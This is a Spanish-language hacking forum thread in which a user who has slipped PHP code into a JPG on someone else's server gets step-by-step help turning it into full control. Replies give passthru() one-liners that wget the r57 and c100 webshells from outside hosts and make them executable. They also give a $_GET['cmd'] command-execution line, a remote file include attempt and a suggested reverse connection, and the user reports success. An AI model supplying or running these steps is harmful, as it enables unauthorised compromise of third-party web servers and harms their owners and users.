comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SOLUCIONADO] Ejecutar comandos desde una Shell

  • 11 Respuestas
  • 3435 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado LKI

  • *
  • Underc0der
  • Mensajes: 61
  • Actividad:
    0%
  • Reputación 0
  • |Un día sin aprender nada, es un día perdido..|
    • Ver Perfil
    • Email
« en: Febrero 18, 2016, 05:02:58 pm »
Hola underc0ders tengo una duda sobre una vulnerabilidad..
He logrado subir mi shell a un servidor vulnerable, logre cambiar el formato de mi imagen jpg a .php.
Pero no se como ejecutarla o como se haría ya he probado con .php?cmd=ls y no ha funcionado....
Aclaro que el codigo php lo incruste en la sección de comentario del archivo jpg y luego logre cambiar su extension por php..
Saben como podria ejecutar mi codigo? si es correcto? o deberia buscar alguna otra shell?.

Desde ya muchas gracias a todos  los que deseen ayudarme , no tengo ningún fin malintencionado si logro vulnerar el servidor me comunicare con el webmaster para avisarle y que lo fixee.



PD: Buque en la sección pero no arrojo ningún resultado, por eso es que acudo a ustedes..
« Última modificación: Febrero 20, 2016, 02:20:37 am por EPSILON »
Ser mejor cada día es mi meta

 =LKI=

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 364
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #1 en: Febrero 18, 2016, 05:40:02 pm »
Puede ser que el servidor tenga desactivado por defecto las funciones que se utilizan para ejecutar comandos en php, para comprobar esto subi un script con:
Código: PHP
  1. <?php
  2. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  3. ?>

y fijate en la parte donde dice "disable_functions"



Si ves que la función system() aparece, no vas a poder utilizarla, como alternativa podrias probar por ejemplo passthru(), ahora bien si aparecen todas las funciones que te permitan ejecutar comandos vas a tener que probar algún tipo de bypass para poder utilizarlos xD.

O si no puede ser que no se este interpretando bien el script php porque esta embebido en una imagen, chekea que este punto y coma todo bien.

Saludos!, EPSILON

Desconectado LKI

  • *
  • Underc0der
  • Mensajes: 61
  • Actividad:
    0%
  • Reputación 0
  • |Un día sin aprender nada, es un día perdido..|
    • Ver Perfil
    • Email
« Respuesta #2 en: Febrero 18, 2016, 08:10:21 pm »
Muchas gracias por tu respuesta! . En seguida te digo si funciona.
Ser mejor cada día es mi meta

 =LKI=

Desconectado LKI

  • *
  • Underc0der
  • Mensajes: 61
  • Actividad:
    0%
  • Reputación 0
  • |Un día sin aprender nada, es un día perdido..|
    • Ver Perfil
    • Email
« Respuesta #3 en: Febrero 18, 2016, 08:23:56 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Puede ser que el servidor tenga desactivado por defecto las funciones que se utilizan para ejecutar comandos en php, para comprobar esto subi un script con:
Código: PHP
  1. <?php
  2. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  3. ?>

y fijate en la parte donde dice "disable_functions"



Si ves que la función system() aparece, no vas a poder utilizarla, como alternativa podrias probar por ejemplo passthru(), ahora bien si aparecen todas las funciones que te permitan ejecutar comandos vas a tener que probar algún tipo de bypass para poder utilizarlos xD.

O si no puede ser que no se este interpretando bien el script php porque esta embebido en una imagen, chekea que este punto y coma todo bien.

Saludos!, EPSILON

Revise lo que me dijiste aca te dejo la captura no aparece el comando system...



te dejo el texto por si no ves bien, estos son los que aparecen como disabled:
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,   pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,

¿Ahora que tipo de comando podria incluir que comprometa aun mas la vulnerabilidad del servidor? y que entre en el poco campo de texto de los comentarios de una foto?
Ser mejor cada día es mi meta

 =LKI=

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 364
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #4 en: Febrero 18, 2016, 09:33:38 pm »
Esta todo bien, si podes tirar comandos por consola en ese servidor, por lo que yo diría que el código php esta mal embebido en la imagen entonces el servidor no lo interpreta como debería, entonces primero que nada te pregunto si elemental que uses ese tipo de bypass? osea si si o si tenes que bypassear el content-type? en una de esas con cambiar la extensión ya esta; y si no vas a tener que ver bien como metes el código php en la imagen esto que te paso es comuna a mi me paso un par de veces, proba con otras imágenes preferentemente *.gif y juga hasta que lo logres. y respecto a lo ultimo que me decías, ese script que queres ejecutar en el servidor es lo máximo que podes hacer sin ser root (tirar comandos) si queres comprometer mas el servidor tenes que tratar de rootearlo con algún exploit. Ahora bien yo te recomiendo que en vez de que andes tirando comandos te bajes en el servidor una webshell y listo, es lo mas cómodo para trabajar, podes probar con esto:

Código: PHP
  1. <?php
  2. No tienes permisos para ver links. Registrate o Entra con tu cuenta('wget http://www.r57shell.net/shell/r57.txt -O R57.php && chmod 777 R57.php');
  3. ?>

Obviamente si queres podes probar con otra webshell que te guste mas, con esto usas la funcion passthru() para ejecutar WGET, bajar una webshell .txt (si osi tiene que ser asi) y la renombra a .php, luego le da permisos de ejecución. Con esto directamente ejecutas la webshell desde la URL y chau.

Saludos!, EPSILON
« Última modificación: Febrero 18, 2016, 09:36:25 pm por EPSILON »

Desconectado LKI

  • *
  • Underc0der
  • Mensajes: 61
  • Actividad:
    0%
  • Reputación 0
  • |Un día sin aprender nada, es un día perdido..|
    • Ver Perfil
    • Email
« Respuesta #5 en: Febrero 18, 2016, 09:40:01 pm »
Muchas gracias!!! Si la verdad que creo que el primer php estaba mal embebido...
Voy a probar con esa shell o con la c99 traducida que esta colgada acá en underc0de..
Voy a ver si puedo con otras extensiones como me dijiste y te cuento que tal va parece que todo va encaminado. Gracias!!
Ser mejor cada día es mi meta

 =LKI=

Desconectado LKI

  • *
  • Underc0der
  • Mensajes: 61
  • Actividad:
    0%
  • Reputación 0
  • |Un día sin aprender nada, es un día perdido..|
    • Ver Perfil
    • Email
« Respuesta #6 en: Febrero 19, 2016, 11:37:38 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Esta todo bien, si podes tirar comandos por consola en ese servidor, por lo que yo diría que el código php esta mal embebido en la imagen entonces el servidor no lo interpreta como debería, entonces primero que nada te pregunto si elemental que uses ese tipo de bypass? osea si si o si tenes que bypassear el content-type? en una de esas con cambiar la extensión ya esta; y si no vas a tener que ver bien como metes el código php en la imagen esto que te paso es comuna a mi me paso un par de veces, proba con otras imágenes preferentemente *.gif y juga hasta que lo logres. y respecto a lo ultimo que me decías, ese script que queres ejecutar en el servidor es lo máximo que podes hacer sin ser root (tirar comandos) si queres comprometer mas el servidor tenes que tratar de rootearlo con algún exploit. Ahora bien yo te recomiendo que en vez de que andes tirando comandos te bajes en el servidor una webshell y listo, es lo mas cómodo para trabajar, podes probar con esto:

Código: PHP
  1. <?php
  2. No tienes permisos para ver links. Registrate o Entra con tu cuenta('wget http://www.r57shell.net/shell/r57.txt -O R57.php && chmod 777 R57.php');
  3. ?>

Obviamente si queres podes probar con otra webshell que te guste mas, con esto usas la funcion passthru() para ejecutar WGET, bajar una webshell .txt (si osi tiene que ser asi) y la renombra a .php, luego le da permisos de ejecución. Con esto directamente ejecutas la webshell desde la URL y chau.

Saludos!, EPSILON

Muchas gracias!! te comento todo lo que he ido descubriendo gracias a tu ayuda:
Probe el comando que descarga la shell y al ir a la ruta de la imagen con la extension .php la pantalla se quedaba en blanco y no se veia la shell..
Luego probe con el comando
Código: PHP
  1.  <?php No tienes permisos para ver links. Registrate o Entra con tu cuenta($_GET['cmd']);?>
y funciono! ejecute el comando php?cmd= ls y vi una lista de imagenes subidas y sorpresivamente vi el archivo R57.php entre la lista trate de acceder a el via url y de vuelta se volvió a poner la pantalla en blanco sin dejarme entrar a la shell...

Ademas probe el comando :
Código: PHP
  1.  <?php include($_GET["module"].".php"); ?>


Y al tratar de acceder e incluir mi shell via example.com/?module=pastebin.com/mymaliciousscript no respondió...


¿Alguna otra sugerencia?. Desde ya muchísimas gracias!
Ser mejor cada día es mi meta

 =LKI=

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1910
  • Actividad:
    13.33%
  • Reputación 15
    • Ver Perfil
« Respuesta #7 en: Febrero 19, 2016, 02:41:33 pm »
Porque no subes una shell y realizas una conexión inversa?



Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 364
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #8 en: Febrero 19, 2016, 03:14:53 pm »
@No tienes permisos para ver links. Registrate o Entra con tu cuenta se podría decir que ya tenes comprometida la web por que tenes shell y podes tirar comandos, ahora bien la webshell si se subio y se le dio permisos pero por alguna razón el servidor no la interpreta, anda jugando y probando con otras webshells como hiciste con las imágenes, esto es asi es probar y probar alternativas hasta que se de, también como dices podrías crear un rfi e incluir la shell desde ahi.

Saludos!, EPSILON

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 364
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #9 en: Febrero 19, 2016, 03:47:07 pm »
@No tienes permisos para ver links. Registrate o Entra con tu cuenta proba subiendo este code tal cual y ejecutalo:

Código: PHP
  1. <?php
  2. No tienes permisos para ver links. Registrate o Entra con tu cuenta('wget http://www.c99shellphp.com/shell/c100.txt -O c100.php');
  3. ?>

luego te vas a la url y pones /c100.php y listo, te tiene que funcionar si o si yo lo probé en local y me funciono.

Saludos!, EPSILON

Desconectado LKI

  • *
  • Underc0der
  • Mensajes: 61
  • Actividad:
    0%
  • Reputación 0
  • |Un día sin aprender nada, es un día perdido..|
    • Ver Perfil
    • Email
« Respuesta #10 en: Febrero 19, 2016, 07:12:13 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
@No tienes permisos para ver links. Registrate o Entra con tu cuenta proba subiendo este code tal cual y ejecutalo:

Código: PHP
  1. <?php
  2. No tienes permisos para ver links. Registrate o Entra con tu cuenta('wget http://www.c99shellphp.com/shell/c100.txt -O c100.php');
  3. ?>

luego te vas a la url y pones /c100.php y listo, te tiene que funcionar si o si yo lo probé en local y me funciono.

Saludos!, EPSILON



Funcionó muchas gracias!!!!!
Saludos en serio me ha servido mucho lo que me has enseñado!!
Ser mejor cada día es mi meta

 =LKI=

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 364
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #11 en: Febrero 19, 2016, 07:40:29 pm »
De nada compañero! para eso estamos, ahora si quieres puedes subir mas fácilmente otra webshell que te quede mas cómoda desde el upload de esa webshell que subiste.
Ahora si puede dar por solucionado este post, cualquier otra duda no dudes en postearla acá y te ayudaremos.

Saludos!, EPSILON

 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] ¿Kali Linux o Kali Linux Ligth ?

Iniciado por worq

Respuestas: 2
Vistas: 6353
Último mensaje Noviembre 21, 2017, 12:28:54 pm
por Codig0Bit
[SOLUCIONADO] ¿Como publicar un software como software libre?

Iniciado por FuriosoJack

Respuestas: 2
Vistas: 1540
Último mensaje Mayo 23, 2017, 07:24:22 am
por HATI
[SOLUCIONADO] Multiuploader de imagenes con mysql, hosting de imagenes con mysql

Iniciado por graphixx

Respuestas: 4
Vistas: 2135
Último mensaje Marzo 26, 2013, 05:42:58 pm
por Xt3mP
[SOLUCIONADO] Linux Mint, errores, errores y mas errores...

Iniciado por n1sendev

Respuestas: 12
Vistas: 2688
Último mensaje Noviembre 22, 2017, 06:50:55 am
por RuidosoBSD
[SOLUCIONADO] Ayuda urgente con Virus "Virus.Win32Sality"

Iniciado por Napsters

Respuestas: 6
Vistas: 3350
Último mensaje Junio 11, 2012, 03:38:18 am
por Satyricon